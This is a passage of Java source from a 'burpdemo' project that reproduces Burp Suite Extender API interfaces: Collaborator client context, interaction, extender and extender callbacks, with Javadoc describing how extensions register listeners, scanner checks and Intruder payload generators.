-------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IBurpCollaboratorClientContext.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.List; 13 | 14 | /** 15 | * This interface represents an instance of a Burp Collaborator client context, 16 | * which can be used to generate Burp Collaborator payloads and poll the 17 | * Collaborator server for any network interactions that result from using those 18 | * payloads. Extensions can obtain new instances of this class by calling 19 | * IBurpExtenderCallbacks.createBurpCollaboratorClientContext(). 20 | * Note that each Burp Collaborator client context is tied to the Collaborator 21 | * server configuration that was in place at the time the context was created. 22 | */ 23 | public interface IBurpCollaboratorClientContext 24 | { 25 | 26 | /** 27 | * This method is used to generate new Burp Collaborator payloads. 28 | * 29 | * @param includeCollaboratorServerLocation Specifies whether to include the 30 | * Collaborator server location in the generated payload. 31 | * @return The payload that was generated. 32 | * 33 | * @throws IllegalStateException if Burp Collaborator is disabled 34 | */ 35 | String generatePayload(boolean includeCollaboratorServerLocation); 36 | 37 | /** 38 | * This method is used to retrieve all interactions received by the 39 | * Collaborator server resulting from payloads that were generated for this 40 | * context. 41 | * 42 | * @return The Collaborator interactions that have occurred resulting from 43 | * payloads that were generated for this context. 44 | * 45 | * @throws IllegalStateException if Burp Collaborator is disabled 46 | */ 47 | List fetchAllCollaboratorInteractions(); 48 | 49 | /** 50 | * This method is used to retrieve interactions received by the Collaborator 51 | * server resulting from a single payload that was generated for this 52 | * context. 53 | * 54 | * @param payload The payload for which interactions will be retrieved. 55 | * @return The Collaborator interactions that have occurred resulting from 56 | * the given payload. 57 | * 58 | * @throws IllegalStateException if Burp Collaborator is disabled 59 | */ 60 | List fetchCollaboratorInteractionsFor(String payload); 61 | 62 | /** 63 | * This method is used to retrieve all interactions made by Burp Infiltrator 64 | * instrumentation resulting from payloads that were generated for this 65 | * context. 66 | * 67 | * @return The interactions triggered by the Burp Infiltrator 68 | * instrumentation that have occurred resulting from payloads that were 69 | * generated for this context. 70 | * 71 | * @throws IllegalStateException if Burp Collaborator is disabled 72 | */ 73 | List fetchAllInfiltratorInteractions(); 74 | 75 | /** 76 | * This method is used to retrieve interactions made by Burp Infiltrator 77 | * instrumentation resulting from a single payload that was generated for 78 | * this context. 79 | * 80 | * @param payload The payload for which interactions will be retrieved. 81 | * @return The interactions triggered by the Burp Infiltrator 82 | * instrumentation that have occurred resulting from the given payload. 83 | * 84 | * @throws IllegalStateException if Burp Collaborator is disabled 85 | */ 86 | List fetchInfiltratorInteractionsFor(String payload); 87 | 88 | /** 89 | * This method is used to retrieve the network location of the Collaborator 90 | * server. 91 | * 92 | * @return The hostname or IP address of the Collaborator server. 93 | * 94 | * @throws IllegalStateException if Burp Collaborator is disabled 95 | */ 96 | String getCollaboratorServerLocation(); 97 | } 98 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IBurpCollaboratorInteraction.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IBurpCollaboratorInteraction.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.util.Map; 13 | 14 | /** 15 | * This interface represents a network interaction that occurred with the Burp 16 | * Collaborator server. 17 | */ 18 | public interface IBurpCollaboratorInteraction 19 | { 20 | 21 | /** 22 | * This method is used to retrieve a property of the interaction. Properties 23 | * of all interactions are: interaction_id, type, client_ip, and time_stamp. 24 | * Properties of DNS interactions are: query_type and raw_query. The 25 | * raw_query value is Base64-encoded. Properties of HTTP interactions are: 26 | * protocol, request, and response. The request and response values are 27 | * Base64-encoded. 28 | * 29 | * @param name The name of the property to retrieve. 30 | * @return A string representing the property value, or null if not present. 31 | */ 32 | String getProperty(String name); 33 | 34 | /** 35 | * This method is used to retrieve a map containing all properties of the 36 | * interaction. 37 | * 38 | * @return A map containing all properties of the interaction. 39 | */ 40 | Map getProperties(); 41 | } 42 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IBurpExtender.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IBurpExtender.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | /** 13 | * All extensions must implement this interface. 14 | * 15 | * Implementations must be called BurpExtender, in the package burp, must be 16 | * declared public, and must provide a default (public, no-argument) 17 | * constructor. 18 | */ 19 | public interface IBurpExtender 20 | { 21 | /** 22 | * This method is invoked when the extension is loaded. It registers an 23 | * instance of the 24 | * IBurpExtenderCallbacks interface, providing methods that may 25 | * be invoked by the extension to perform various actions. 26 | * 27 | * @param callbacks An 28 | * IBurpExtenderCallbacks object. 29 | */ 30 | void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks); 31 | } 32 | -------------------------------------------------------------------------------- /burpdemo/src/burp/IBurpExtenderCallbacks.java: -------------------------------------------------------------------------------- 1 | package burp; 2 | 3 | /* 4 | * @(#)IBurpExtenderCallbacks.java 5 | * 6 | * Copyright PortSwigger Ltd. All rights reserved. 7 | * 8 | * This code may be used to extend the functionality of Burp Suite Community Edition 9 | * and Burp Suite Professional, provided that this usage does not violate the 10 | * license terms for those products. 11 | */ 12 | import java.awt.Component; 13 | import java.io.OutputStream; 14 | import java.util.List; 15 | import java.util.Map; 16 | 17 | /** 18 | * This interface is used by Burp Suite to pass to extensions a set of callback 19 | * methods that can be used by extensions to perform various actions within 20 | * Burp. 21 | * 22 | * When an extension is loaded, Burp invokes its 23 | * registerExtenderCallbacks() method and passes an instance of the 24 | * IBurpExtenderCallbacks interface. The extension may then invoke 25 | * the methods of this interface as required in order to extend Burp's 26 | * functionality. 27 | */ 28 | public interface IBurpExtenderCallbacks 29 | { 30 | 31 | /** 32 | * Flag used to identify Burp Suite as a whole. 33 | */ 34 | int TOOL_SUITE = 0x00000001; 35 | /** 36 | * Flag used to identify the Burp Target tool. 37 | */ 38 | int TOOL_TARGET = 0x00000002; 39 | /** 40 | * Flag used to identify the Burp Proxy tool. 41 | */ 42 | int TOOL_PROXY = 0x00000004; 43 | /** 44 | * Flag used to identify the Burp Spider tool. 45 | */ 46 | int TOOL_SPIDER = 0x00000008; 47 | /** 48 | * Flag used to identify the Burp Scanner tool. 49 | */ 50 | int TOOL_SCANNER = 0x00000010; 51 | /** 52 | * Flag used to identify the Burp Intruder tool. 53 | */ 54 | int TOOL_INTRUDER = 0x00000020; 55 | /** 56 | * Flag used to identify the Burp Repeater tool. 57 | */ 58 | int TOOL_REPEATER = 0x00000040; 59 | /** 60 | * Flag used to identify the Burp Sequencer tool. 61 | */ 62 | int TOOL_SEQUENCER = 0x00000080; 63 | /** 64 | * Flag used to identify the Burp Decoder tool. 65 | */ 66 | int TOOL_DECODER = 0x00000100; 67 | /** 68 | * Flag used to identify the Burp Comparer tool. 69 | */ 70 | int TOOL_COMPARER = 0x00000200; 71 | /** 72 | * Flag used to identify the Burp Extender tool. 73 | */ 74 | int TOOL_EXTENDER = 0x00000400; 75 | 76 | /** 77 | * This method is used to set the display name for the current extension, 78 | * which will be displayed within the user interface for the Extender tool. 79 | * 80 | * @param name The extension name. 81 | */ 82 | void setExtensionName(String name); 83 | 84 | /** 85 | * This method is used to obtain an IExtensionHelpers object, 86 | * which can be used by the extension to perform numerous useful tasks. 87 | * 88 | * @return An object containing numerous helper methods, for tasks such as 89 | * building and analyzing HTTP requests. 90 | */ 91 | IExtensionHelpers getHelpers(); 92 | 93 | /** 94 | * This method is used to obtain the current extension's standard output 95 | * stream. Extensions should write all output to this stream, allowing the 96 | * Burp user to configure how that output is handled from within the UI. 97 | * 98 | * @return The extension's standard output stream. 99 | */ 100 | OutputStream getStdout(); 101 | 102 | /** 103 | * This method is used to obtain the current extension's standard error 104 | * stream. Extensions should write all error messages to this stream, 105 | * allowing the Burp user to configure how that output is handled from 106 | * within the UI. 107 | * 108 | * @return The extension's standard error stream. 109 | */ 110 | OutputStream getStderr(); 111 | 112 | /** 113 | * This method prints a line of output to the current extension's standard 114 | * output stream. 115 | * 116 | * @param output The message to print. 117 | */ 118 | void printOutput(String output); 119 | 120 | /** 121 | * This method prints a line of output to the current extension's standard 122 | * error stream. 123 | * 124 | * @param error The message to print. 125 | */ 126 | void printError(String error); 127 | 128 | /** 129 | * This method is used to register a listener which will be notified of 130 | * changes to the extension's state. Note: Any extensions that start 131 | * background threads or open system resources (such as files or database 132 | * connections) should register a listener and terminate threads / close 133 | * resources when the extension is unloaded. 134 | * 135 | * @param listener An object created by the extension that implements the 136 | * IExtensionStateListener interface. 137 | */ 138 | void registerExtensionStateListener(IExtensionStateListener listener); 139 | 140 | /** 141 | * This method is used to retrieve the extension state listeners that are 142 | * registered by the extension. 143 | * 144 | * @return A list of extension state listeners that are currently registered 145 | * by this extension. 146 | */ 147 | List getExtensionStateListeners(); 148 | 149 | /** 150 | * This method is used to remove an extension state listener that has been 151 | * registered by the extension. 152 | * 153 | * @param listener The extension state listener to be removed. 154 | */ 155 | void removeExtensionStateListener(IExtensionStateListener listener); 156 | 157 | /** 158 | * This method is used to register a listener which will be notified of 159 | * requests and responses made by any Burp tool. Extensions can perform 160 | * custom analysis or modification of these messages by registering an HTTP 161 | * listener. 162 | * 163 | * @param listener An object created by the extension that implements the 164 | * IHttpListener interface. 165 | */ 166 | void registerHttpListener(IHttpListener listener); 167 | 168 | /** 169 | * This method is used to retrieve the HTTP listeners that are registered by 170 | * the extension. 171 | * 172 | * @return A list of HTTP listeners that are currently registered by this 173 | * extension. 174 | */ 175 | List getHttpListeners(); 176 | 177 | /** 178 | * This method is used to remove an HTTP listener that has been registered 179 | * by the extension. 180 | * 181 | * @param listener The HTTP listener to be removed. 182 | */ 183 | void removeHttpListener(IHttpListener listener); 184 | 185 | /** 186 | * This method is used to register a listener which will be notified of 187 | * requests and responses being processed by the Proxy tool. Extensions can 188 | * perform custom analysis or modification of these messages, and control 189 | * in-UI message interception, by registering a proxy listener. 190 | * 191 | * @param listener An object created by the extension that implements the 192 | * IProxyListener interface. 193 | */ 194 | void registerProxyListener(IProxyListener listener); 195 | 196 | /** 197 | * This method is used to retrieve the Proxy listeners that are registered 198 | * by the extension. 199 | * 200 | * @return A list of Proxy listeners that are currently registered by this 201 | * extension. 202 | */ 203 | List getProxyListeners(); 204 | 205 | /** 206 | * This method is used to remove a Proxy listener that has been registered 207 | * by the extension. 208 | * 209 | * @param listener The Proxy listener to be removed. 210 | */ 211 | void removeProxyListener(IProxyListener listener); 212 | 213 | /** 214 | * This method is used to register a listener which will be notified of new 215 | * issues that are reported by the Scanner tool. Extensions can perform 216 | * custom analysis or logging of Scanner issues by registering a Scanner 217 | * listener. 218 | * 219 | * @param listener An object created by the extension that implements the 220 | * IScannerListener interface. 221 | */ 222 | void registerScannerListener(IScannerListener listener); 223 | 224 | /** 225 | * This method is used to retrieve the Scanner listeners that are registered 226 | * by the extension. 227 | * 228 | * @return A list of Scanner listeners that are currently registered by this 229 | * extension. 230 | */ 231 | List getScannerListeners(); 232 | 233 | /** 234 | * This method is used to remove a Scanner listener that has been registered 235 | * by the extension. 236 | * 237 | * @param listener The Scanner listener to be removed. 238 | */ 239 | void removeScannerListener(IScannerListener listener); 240 | 241 | /** 242 | * This method is used to register a listener which will be notified of 243 | * changes to Burp's suite-wide target scope. 244 | * 245 | * @param listener An object created by the extension that implements the 246 | * IScopeChangeListener interface. 247 | */ 248 | void registerScopeChangeListener(IScopeChangeListener listener); 249 | 250 | /** 251 | * This method is used to retrieve the scope change listeners that are 252 | * registered by the extension. 253 | * 254 | * @return A list of scope change listeners that are currently registered by 255 | * this extension. 256 | */ 257 | List getScopeChangeListeners(); 258 | 259 | /** 260 | * This method is used to remove a scope change listener that has been 261 | * registered by the extension. 262 | * 263 | * @param listener The scope change listener to be removed. 264 | */ 265 | void removeScopeChangeListener(IScopeChangeListener listener); 266 | 267 | /** 268 | * This method is used to register a factory for custom context menu items. 269 | * When the user invokes a context menu anywhere within Burp, the factory 270 | * will be passed details of the invocation event, and asked to provide any 271 | * custom context menu items that should be shown. 272 | * 273 | * @param factory An object created by the extension that implements the 274 | * IContextMenuFactory interface. 275 | */ 276 | void registerContextMenuFactory(IContextMenuFactory factory); 277 | 278 | /** 279 | * This method is used to retrieve the context menu factories that are 280 | * registered by the extension. 281 | * 282 | * @return A list of context menu factories that are currently registered by 283 | * this extension. 284 | */ 285 | List getContextMenuFactories(); 286 | 287 | /** 288 | * This method is used to remove a context menu factory that has been 289 | * registered by the extension. 290 | * 291 | * @param factory The context menu factory to be removed. 292 | */ 293 | void removeContextMenuFactory(IContextMenuFactory factory); 294 | 295 | /** 296 | * This method is used to register a factory for custom message editor tabs. 297 | * For each message editor that already exists, or is subsequently created, 298 | * within Burp, the factory will be asked to provide a new instance of an 299 | * IMessageEditorTab object, which can provide custom rendering 300 | * or editing of HTTP messages. 301 | * 302 | * @param factory An object created by the extension that implements the 303 | * IMessageEditorTabFactory interface. 304 | */ 305 | void registerMessageEditorTabFactory(IMessageEditorTabFactory factory); 306 | 307 | /** 308 | * This method is used to retrieve the message editor tab factories that are 309 | * registered by the extension. 310 | * 311 | * @return A list of message editor tab factories that are currently 312 | * registered by this extension. 313 | */ 314 | List getMessageEditorTabFactories(); 315 | 316 | /** 317 | * This method is used to remove a message editor tab factory that has been 318 | * registered by the extension. 319 | * 320 | * @param factory The message editor tab factory to be removed. 321 | */ 322 | void removeMessageEditorTabFactory(IMessageEditorTabFactory factory); 323 | 324 | /** 325 | * This method is used to register a provider of Scanner insertion points. 326 | * For each base request that is actively scanned, Burp will ask the 327 | * provider to provide any custom scanner insertion points that are 328 | * appropriate for the request. 329 | * 330 | * @param provider An object created by the extension that implements the 331 | * IScannerInsertionPointProvider interface. 332 | */ 333 | void registerScannerInsertionPointProvider( 334 | IScannerInsertionPointProvider provider); 335 | 336 | /** 337 | * This method is used to retrieve the Scanner insertion point providers 338 | * that are registered by the extension. 339 | * 340 | * @return A list of Scanner insertion point providers that are currently 341 | * registered by this extension. 342 | */ 343 | List getScannerInsertionPointProviders(); 344 | 345 | /** 346 | * This method is used to remove a Scanner insertion point provider that has 347 | * been registered by the extension. 348 | * 349 | * @param provider The Scanner insertion point provider to be removed. 350 | */ 351 | void removeScannerInsertionPointProvider( 352 | IScannerInsertionPointProvider provider); 353 | 354 | /** 355 | * This method is used to register a custom Scanner check. When performing 356 | * scanning, Burp will ask the check to perform active or passive scanning 357 | * on the base request, and report any Scanner issues that are identified. 358 | * 359 | * @param check An object created by the extension that implements the 360 | * IScannerCheck interface. 361 | */ 362 | void registerScannerCheck(IScannerCheck check); 363 | 364 | /** 365 | * This method is used to retrieve the Scanner checks that are registered by 366 | * the extension. 367 | * 368 | * @return A list of Scanner checks that are currently registered by this 369 | * extension. 370 | */ 371 | List getScannerChecks(); 372 | 373 | /** 374 | * This method is used to remove a Scanner check that has been registered by 375 | * the extension. 376 | * 377 | * @param check The Scanner check to be removed. 378 | */ 379 | void removeScannerCheck(IScannerCheck check); 380 | 381 | /** 382 | * This method is used to register a factory for Intruder payloads. Each 383 | * registered factory will be available within the Intruder UI for the user 384 | * to select as the payload source for an attack. When this is selected, the 385 | * factory will be asked to provide a new instance of an 386 | * IIntruderPayloadGenerator object, which will be used to 387 | * generate payloads for the attack. 388 | * 389 | * @param factory An object created by the extension that implements the 390 | * IIntruderPayloadGeneratorFactory interface. 391 | */ 392 | void registerIntruderPayloadGeneratorFactory( 393 | IIntruderPayloadGeneratorFactory factory); 394 | 395 | /** 396 | * This method is used to retrieve the Intruder payload generator factories 397 | * that are registered by the extension. 398 | * 399 | * @return A list of Intruder payload generator factories that are currently 400 | * registered by this extension. 401 | */ 402 | List 403 | getIntruderPayloadGeneratorFactories(); 404 | 405 | /** 406 | * This method is used to remove an Intruder payload generator factory that 407 | * has been registered by the extension. 408 | * 409 | * @param factory The Intruder payload generator factory to be removed. 410 | */ 411 | void removeIntruderPayloadGeneratorFactory( 412 | IIntruderPayloadGeneratorFactory factory); 413 | 414 | /** 415 | * This method is used to register a custom Intruder payload processor. Each 416 | * registered processor will be available within the Intruder UI for the 417 | * user to select as the action for a payload processing rule. 418 | * 419 | * @param processor An object created by the extension that implements the 420 | * IIntruderPayloadProcessor interface. 421 | */ 422 | void registerIntruderPayloadProcessor(IIntruderPayloadProcessor processor); 423 | 424 | /** 425 | * This method is used to retrieve the Intruder payload processors that are 426 | * registered by the extension. 427 | * 428 | * @return A list of Intruder payload processors that are currently 429 | * registered by this extension. 430 | */ 431 | List getIntruderPayloadProcessors(); 432 | 433 | /** 434 | * This method is used to remove an Intruder payload processor that has been 435 | * registered by the extension. 436 | * 437 | * @param processor The Intruder payload processor to be removed. 438 | */ 439 | void removeIntruderPayloadProcessor(IIntruderPayloadProcessor processor); 440 | 441 | /** 442 | * This method is used to register a custom session handling action. Each 443 | * registered action will be available within the session handling rule UI 444 | * for the user to select as a rule action. Users can choose to invoke an 445 | * action directly in its own right, or following execution of a macro. 446 | * 447 | * @param action An object created by the extension that implements the 448 | * ISessionHandlingAction interface. 449 | */ 450 | void registerSessionHandlingAction(ISessionHandlingAction action); 451 | 452 | /** 453 | * This method is used to retrieve the session handling actions that are 454 | * registered by the extension. 455 | * 456 | * @return A list of session handling actions that are currently registered 457 | * by this extension. 458 | */ 459 | List getSessionHandlingActions(); 460 | 461 | /** 462 | * This method is used to remove a session handling action that has been 463 | * registered by the extension. 464 | * 465 | * @param action The extension session handling action to be removed. 466 | */ 467 | void removeSessionHandlingAction(ISessionHandlingAction action); 468 | 469 | /** 470 | * This method is used to unload the extension from Burp Suite. 471 | */ 472 | void unloadExtension(); 473 | 474 | /** 475 | * This method is used to add a custom tab to the main Burp Suite window. 476 | * 477 | * @param tab An object created by the extension that implements the 478 | * ITab interface. 479 | */ 480 | void addSuiteTab(ITab tab); 481 | 482 | /** 483 | * This method is used to remove a previously-added tab from the main Burp 484 | * Suite window. 485 | * 486 | * @param tab An object created by the extension that implements the 487 | * ITab interface. 488 | */ 489 | void removeSuiteTab(ITab tab); 490 | 491 | /** 492 | * This method is used to customize UI components in line with Burp's UI 493 | * style, including font size, colors, table line spacing, etc. The action 494 | * is performed recursively on any child components of the passed-in 495 | * component. 496 | * 497 | * @param component The UI component to be customized. 498 | */ 499 | void customizeUiComponent(Component component); 500 | 501 | /** 502 | * This method is used to create a new instance of Burp's HTTP message 503 | * editor, for the extension to use in its own UI. 504 | * 505 | * @param controller An object created by the extension that implements the 506 | * IMessageEditorController interface. This parameter is 507 | * optional and may be null. If it is provided, then the 508 | * message editor will query the controller when required to obtain details 509 | * about the currently displayed message, including the 510 | * IHttpService for the message, and the associated request or 511 | * response message. If a controller is not provided, then the message 512 | * editor will not support context menu actions, such as sending requests to 513 | * other Burp tools. 514 | * @param editable Indicates whether the editor created should be editable, 515 | * or used only for message viewing. 516 | * @return An object that implements the IMessageEditor 517 | * interface, and which the extension can use in its own UI. 518 | */ 519 | IMessageEditor createMessageEditor( 520 | IMessageEditorController controller, 521 | boolean editable); 522 | 523 | /** 524 | * This method returns the command line arguments that were passed to Burp 525 | * on startup. 526 | * 527 | * @return The command line arguments that were passed to Burp on startup. 528 | */ 529 | String[] getCommandLineArguments(); 530 | 531 | /** 532 | * This method is used to save configuration settings for the extension in a 533 | * persistent way that survives reloads of the extension and of Burp Suite. 534 | * Saved settings can be retrieved using the method 535 | * loadExtensionSetting(). 536 | * 537 | * @param name The name of the setting. 538 | * @param value The value of the setting. If this value is null 539 | * then any existing setting with the specified name will be removed. 540 | */ 541 | void saveExtensionSetting(String name, String value); 542 | 543 | /** 544 | * This method is used to load configuration settings for the extension that 545 | * were saved using the method saveExtensionSetting(). 546 | * 547 | * @param name The name of the setting. 548 | * @return The value of the setting, or null if no value is 549 | * set. 550 | */ 551 | String loadExtensionSetting(String name); 552 | 553 | /** 554 | * This method is used to create a new instance of Burp's plain text editor, 555 | * for the extension to use in its own UI. 556 | * 557 | * @return An object that implements the ITextEditor interface, 558 | * and which the extension can use in its own UI. 559 | */ 560 | ITextEditor createTextEditor(); 561 | 562 | /** 563 | * This method can be used to send an HTTP request to the Burp Repeater 564 | * tool. The request will be displayed in the user interface, but will not 565 | * be issued until the user initiates this action. 566 | * 567 | * @param host The hostname of the remote HTTP server. 568 | * @param port The port of the remote HTTP server. 569 | * @param useHttps Flags whether the protocol is HTTPS or HTTP. 570 | * @param request The full HTTP request. 571 | * @param tabCaption An optional caption which will appear on the Repeater 572 | * tab containing the request. If this value is null then a 573 | * default tab index will be displayed. 574 | */ 575 | void sendToRepeater( 576 | String host, 577 | int port, 578 | boolean useHttps, 579 | byte[] request, 580 | String tabCaption); 581 | 582 | /** 583 | * This method can be used to send an HTTP request to the Burp Intruder 584 | * tool. The request will be displayed in the user interface, and markers 585 | * for attack payloads will be placed into default locations within the 586 | * request. 587 | * 588 | * @param host The hostname of the remote HTTP server. 589 | * @param port The port of the remote HTTP server. 590 | * @param useHttps Flags whether the protocol is HTTPS or HTTP. 591 | * @param request The full HTTP request. 592 | */ 593 | void sendToIntruder( 594 | String host, 595 | int port, 596 | boolean useHttps, 597 | byte[] request); 598 | 599 | /** 600 | * This method can be used to send an HTTP request to the Burp Intruder 601 | * tool. The request will be displayed in the user interface, and markers 602 | * for attack payloads will be placed into the specified locations within 603 | * the request. 604 | * 605 | * @param host The hostname of the remote HTTP server. 606 | * @param port The port of the remote HTTP server. 607 | * @param useHttps Flags whether the protocol is HTTPS or HTTP. 608 | * @param request The full HTTP request. 609 | * @param payloadPositionOffsets A list of index pairs representing the 610 | * payload positions to be used. Each item in the list must be an int[2] 611 | * array containing the start and end offsets for the payload position. 612 | */ 613 | void sendToIntruder( 614 | String host, 615 | int port, 616 | boolean useHttps, 617 | byte[] request, 618 | List payloadPositionOffsets); 619 | 620 | /** 621 | * This method can be used to send data to the Comparer tool. 622 | * 623 | * @param data The data to be sent to Comparer. 624 | */ 625 | void sendToComparer(byte[] data); 626 | 627 | /** 628 | * This method can be used to send a seed URL to the Burp Spider tool. If 629 | * the URL is not within the current Spider scope, the user will be asked if 630 | * they wish to add the URL to the scope. If the Spider is not currently 631 | * running, it will be started. The seed URL will be requested, and the 632 | * Spider will process the application's response in the normal way. 633 | * 634 | * @param url The new seed URL to begin spidering from. 635 | */ 636 | void sendToSpider( 637 | java.net.URL url); 638 | 639 | /** 640 | * This method can be used to send an HTTP request to the Burp Scanner tool 641 | * to perform an active vulnerability scan. If the request is not within the 642 | * current active scanning scope, the user will be asked if they wish to 643 | * proceed with the scan. 644 | * 645 | * @param host The hostname of the remote HTTP server. 646 | * @param port The port of the remote HTTP server. 647 | * @param useHttps Flags whether the protocol is HTTPS or HTTP. 648 | * @param request The full HTTP request. 649 | * @return The resulting scan queue item. 650 | */ 651 | IScanQueueItem doActiveScan( 652 | String host, 653 | int port, 654 | boolean useHttps, 655 | byte[] request); 656 | 657 | /** 658 | * This method can be used to send an HTTP request to the Burp Scanner tool 659 | * to perform an active vulnerability scan, based on a custom list of 660 | * insertion points that are to be scanned. If the request is not within the 661 | * current active scanning scope, the user will be asked if they wish to 662 | * proceed with the scan. 663 | * 664 | * @param host The hostname of the remote HTTP server. 665 | * @param port The port of the remote HTTP server. 666 | * @param useHttps Flags whether the protocol is HTTPS or HTTP. 667 | * @param request The full HTTP request. 668 | * @param insertionPointOffsets A list of index pairs representing the 669 | * positions of the insertion points that should be scanned. Each item in 670 | * the list must be an int[2] array containing the start and end offsets for 671 | * the insertion point. 672 | * @return The resulting scan queue item. 673 | */ 674 | IScanQueueItem doActiveScan( 675 | String host, 676 | int port, 677 | boolean useHttps, 678 | byte[] request, 679 | List insertionPointOffsets); 680 | 681 | /** 682 | * This method can be used to send an HTTP request to the Burp Scanner tool 683 | * to perform a passive vulnerability scan. 684 | * 685 | * @param host The hostname of the remote HTTP server. 686 | * @param port The port of the remote HTTP server. 687 | * @param useHttps Flags whether the protocol is HTTPS or HTTP. 688 | * @param request The full HTTP request. 689 | * @param response The full HTTP response. 690 | */ 691 | void doPassiveScan( 692 | String host, 693 | int port, 694 | boolean useHttps, 695 | byte[] request, 696 | byte[] response); 697 | 698 | /** 699 | * This method can be used to issue HTTP requests and retrieve their 700 | * responses. 701 | * 702 | * @param httpService The HTTP service to which the request should be sent. 703 | * @param request The full HTTP request. 704 | * @return An object that implements the IHttpRequestResponse 705 | * interface, and which the extension can query to obtain the details of the 706 | * response. 707 | */ 708 | IHttpRequestResponse makeHttpRequest( 709 | IHttpService httpService, 710 | byte[] request); 711 | 712 | /** 713 | * This method can be used to issue HTTP requests and retrieve their 714 | * responses. 715 | * 716 | * @param httpService The HTTP service to which the request should be sent. 717 | * @param request The full HTTP request. 718 | * @param forceHttp1 If true then HTTP/1 will be used. 719 | * @return An object that implements the IHttpRequestResponse 720 | * interface, and which the extension can query to obtain the details of the 721 | * response. 722 | */ 723 | IHttpRequestResponse makeHttpRequest( 724 | IHttpService httpService, 725 | byte[] request, 726 | boolean forceHttp1); 727 | 728 | 729 | /** 730 | * This method can be used to issue HTTP requests and retrieve their 731 | * responses. 732 | * 733 | * @param host The hostname of the remote HTTP server. 734 | * @param port The port of the remote HTTP server. 735 | * @param useHttps Flags whether the protocol is HTTPS or HTTP. 736 | * @param request The full HTTP request. 737 | * @return The full response retrieved from the remote server. 738 | */ 739 | byte[] makeHttpRequest( 740 | String host, 741 | int port, 742 | boolean useHttps, 743 | byte[] request); 744 | 745 | /** 746 | * This method can be used to issue HTTP requests and retrieve their 747 | * responses. 748 | * 749 | * @param host The hostname of the remote HTTP server. 750 | * @param port The port of the remote HTTP server. 751 | * @param useHttps Flags whether the protocol is HTTPS or HTTP. 752 | * @param request The full HTTP request. 753 | * @param forceHttp1 If true then HTTP/1 will be used. 754 | * @return The full response retrieved from the remote server. 755 | */ 756 | byte[] makeHttpRequest( 757 | String host, 758 | int port, 759 | boolean useHttps, 760 | byte[] request, 761 | boolean forceHttp1); 762 | 763 | /** 764 | * This method can be used to issue HTTP/2 requests and retrieve their 765 | * responses. 766 | * @param httpService The HTTP service to which the request should be sent. 767 | * @param headers The headers of the request. 768 | * @param body The body of the request. 769 | * @return The full response retrieved from the remote server. 770 | */ 771 | byte[] makeHttp2Request( 772 | IHttpService httpService, 773 | List headers, 774 | byte[] body); 775 | 776 | /** 777 | * This method can be used to issue HTTP/2 requests and retrieve their 778 | * responses. You can use this to force the network stack to send this 779 | * request using HTTP/2. 780 | * @param httpService The HTTP service to which the request should be sent. 781 | * @param headers The headers of the request. 782 | * @param body The body of the request. 783 | * @param forceHttp2 Whether or not to force HTTP/2 for this request. 784 | * @return The full response retrieved from the remote server. 785 | */ 786 | byte[] makeHttp2Request( 787 | IHttpService httpService, 788 | List headers, 789 | byte[] body, 790 | boolean forceHttp2); 791 | 792 | /** 793 | * This method can be used to issue HTTP/2 requests and retrieve their 794 | * responses. You can use this to make the network stack send this request 795 | * using a specific named connection. 796 | * @param httpService The HTTP service to which the request should be sent. 797 | * @param headers The headers of the request. 798 | * @param body The body of the request. 799 | * @param forceHttp2 Whether or not to force HTTP/2 for this request. 800 | * @param connectionIdentifier The identifier for the connection you want to use. 801 | * @return The full response retrieved from the remote server. 802 | */ 803 | byte[] makeHttp2Request( 804 | IHttpService httpService, 805 | List headers, 806 | byte[] body, 807 | boolean forceHttp2, 808 | String connectionIdentifier); 809 | 810 | /** 811 | * This method can be used to query whether a specified URL is within the 812 | * current Suite-wide scope. 813 | * 814 | * @param url The URL to query. 815 | * @return Returns true if the URL is within the current 816 | * Suite-wide scope. 817 | */ 818 | boolean isInScope(java.net.URL url); 819 | 820 | /** 821 | * This method can be used to include the specified URL in the Suite-wide 822 | * scope. 823 | * 824 | * @param url The URL to include in the Suite-wide scope. 825 | */ 826 | void includeInScope(java.net.URL url); 827 | 828 | /** 829 | * This method can be used to exclude the specified URL from the Suite-wide 830 | * scope. 831 | * 832 | * @param url The URL to exclude from the Suite-wide scope. 833 | */ 834 | void excludeFromScope(java.net.URL url); 835 | 836 | /** 837 | * This method can be used to display a specified message in the Burp Suite 838 | * alerts tab. 839 | * 840 | * @param message The alert message to display. 841 | */ 842 | void issueAlert(String message); 843 | 844 | /** 845 | * This method returns details of all items in the Proxy history. 846 | * 847 | * @return The contents of the Proxy history. 848 | */ 849 | IHttpRequestResponse[] getProxyHistory(); 850 | 851 | /** 852 | * This method returns details of items in the site map. 853 | * 854 | * @param urlPrefix This parameter can be used to specify a URL prefix, in 855 | * order to extract a specific subset of the site map. The method performs a 856 | * simple case-sensitive text match, returning all site map items whose URL 857 | * begins with the specified prefix. If this parameter is null, the entire 858 | * site map is returned. 859 | * 860 | * @return Details of items in the site map. 861 | */ 862 | IHttpRequestResponse[] getSiteMap(String urlPrefix); 863 | 864 | /** 865 | * This method returns all of the current scan issues for URLs matching the 866 | * specified literal prefix. 867 | * 868 | * @param urlPrefix This parameter can be used to specify a URL prefix, in 869 | * order to extract a specific subset of scan issues. The method performs a 870 | * simple case-sensitive text match, returning all scan issues whose URL 871 | * begins with the specified prefix. If this parameter is null, all issues 872 | * are returned. 873 | * @return Details of the scan issues. 874 | */ 875 | IScanIssue[] getScanIssues(String urlPrefix); 876 | 877 | /** 878 | * This method is used to generate a report for the specified Scanner 879 | * issues. The report format can be specified. For all other reporting 880 | * options, the default settings that appear in the reporting UI wizard are 881 | * used. 882 | * 883 | * @param format The format to be used in the report. Accepted values are 